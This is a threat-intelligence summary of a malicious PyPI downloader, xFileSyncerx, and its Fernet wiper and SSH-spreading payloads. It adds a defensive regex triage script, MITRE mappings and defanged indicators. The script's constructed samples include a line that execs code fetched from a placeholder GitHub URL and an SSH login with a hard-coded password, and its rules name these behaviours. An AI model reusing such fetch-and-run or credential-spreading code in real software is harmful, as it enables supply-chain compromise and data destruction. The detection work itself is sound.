Python downloader highlights noise problem in open source threat detection

ReversingLabs researchers uncovered a malicious PyPI package named xFileSyncerx containing downloader and wiper components (s2.py and s3.py) tied to red-team testing. The case highlights growing open-source threat noise, where test/grayware can blur legitimate supply-chain risks and hinder detection.
#xFileSyncerx #s2.py #s3.py #d3duct1v #BellJ1 #PyPI #GitHub

Keypoints

  • xFileSyncerx is a PyPI package that includes separate malicious wiper components (s2.py and s3.py) and was distributed with obfuscated code.
  • The downloader (xFileSyncerx) fetches a second-stage payload from a remote URL, indicating a staged malware chain.
  • s2.py encrypts files under /home with Fernet, excluding hidden files to preserve SSH functionality, and includes a README message that references a computer meme.
  • s2.py later attempts lateral movement, using hard-coded SSH credentials to spread to other devices; s3.py is a similar wiper payload without the spreading behavior.
  • The author behind the tool claims to be a US-based penetration tester; the packages were used for red-team testing of a client’s SOC.
  • The incident illustrates escalating “noise” in open-source ecosystems (goodware, malware, grayware) and the challenge of distinguishing genuine threats from test artifacts; the researchers call for clearer publishing guidelines for test/grayware packages.
  • IOCs identified include the PyPI package xFileSyncerx (0.0.2, SHA1 e200d11a089e66840598b104b57e9758855031b3) and GitHub raw URLs for s2.py and s3.py.
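The behaviors listed above (remote fetch of a second stage from a raw GitHub URL, Fernet encryption of /home that skips hidden files, SSH spreading with hard-coded credentials) can be turned into a simple static triage rule for Python package contents. The following is an added example, not code from the ReversingLabs write-up or from the packages it describes; the rule names, the grouping logic and the sample sources are constructed for illustration, and the samples are scanned as text only.

```python
import re

# One regex per behaviour the write-up describes. A single hit is weak evidence;
# the combination of behaviours is what makes a package worth a human look.
RULES = {
    "remote_fetch_raw_github": re.compile(r"raw\.githubusercontent\.com/[^\"'\s]+\.py"),
    "dynamic_exec_of_fetched_code": re.compile(r"\bexec\s*\("),
    "fernet_import": re.compile(r"from\s+cryptography\.fernet\s+import\s+Fernet"),
    "walks_home_dir": re.compile(r"os\.walk\(\s*['\"]/home"),
    "skips_hidden_files": re.compile(r"startswith\(\s*['\"]\.['\"]\s*\)"),
    "ssh_hardcoded_password": re.compile(r"\.connect\([^)]*password\s*=\s*['\"][^'\"]+['\"]"),
}

# Behaviour groups mirroring the staged chain: downloader -> wiper -> spreader.
GROUPS = {
    "downloader": {"remote_fetch_raw_github", "dynamic_exec_of_fetched_code"},
    "wiper": {"fernet_import", "walks_home_dir", "skips_hidden_files"},
    "spreader": {"ssh_hardcoded_password"},
}

def scan_source(src: str) -> set[str]:
    """Return the names of every rule that fires on one Python source file."""
    return {name for name, rx in RULES.items() if rx.search(src)}

def classify(findings: set[str]) -> tuple[str, list[str]]:
    """Map fired rules to behaviour groups and a coarse triage verdict (hypothetical labels)."""
    groups = sorted(g for g, members in GROUPS.items() if findings & members)
    if len(groups) >= 2 or "spreader" in groups:
        return "review-high", groups
    if groups:
        return "review-low", groups
    return "clean", groups

# Constructed samples (not the real packages) that mimic the shapes described;
# hosts, repositories and credentials are placeholders.
SAMPLE_DOWNLOADER = '''
import urllib.request
u = "https://raw.githubusercontent.com/EXAMPLE-ORG/EXAMPLE-REPO/main/s2.py"
exec(urllib.request.urlopen(u).read())
'''
SAMPLE_WIPER = '''
from cryptography.fernet import Fernet
for root, dirs, files in os.walk("/home"):
    files = [f for f in files if not f.startswith(".")]
c = paramiko.SSHClient()
c.connect(host, username="user", password="EXAMPLE-PASSWORD")
'''
SAMPLE_BENIGN = '''
for root, dirs, files in os.walk(base_dir):
    print(files)
'''
```

Regex rules like these are cheap to run in a package-ingest pipeline but easy to evade with obfuscation (the write-up notes the downloader URL itself was obfuscated), so treat a hit as a prompt for review rather than a verdict.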

MITRE Techniques

  • [T1105] Ingress Tool Transfer – ‘downloading second stage malware from a remote URL.’
  • [T1027] Obfuscated/Compressed Files or Information – ‘presence of code obfuscation’ and obfuscated download URL content.
  • [T1021.004] SSH – ‘spreads across the local network by leveraging SSH to try to connect to other devices using hard coded credentials.’
  • [T1078] Valid Accounts – ‘hard coded credentials’ used to attempt SSH login to lateral movement targets.
  • [T1486] Data Encrypted for Impact – ‘encrypt all files except hidden files’ during the wiper activity.

Indicators of Compromise

  • [Package] PyPI – xFileSyncerx, version 0.0.2 – SHA1 e200d11a089e66840598b104b57e9758855031b3
  • [URL] GitHub raw payloads – hxxps://raw.githubusercontent.com/d3duct1v/tester-of-trees/main/s2.py, hxxps://raw.githubusercontent.com/d3duct1v/tester-of-trees/main/s3.py

Read more: https://www.reversinglabs.com/blog/python-downloader-highlights-noise-problem-in-open-source-threat-detection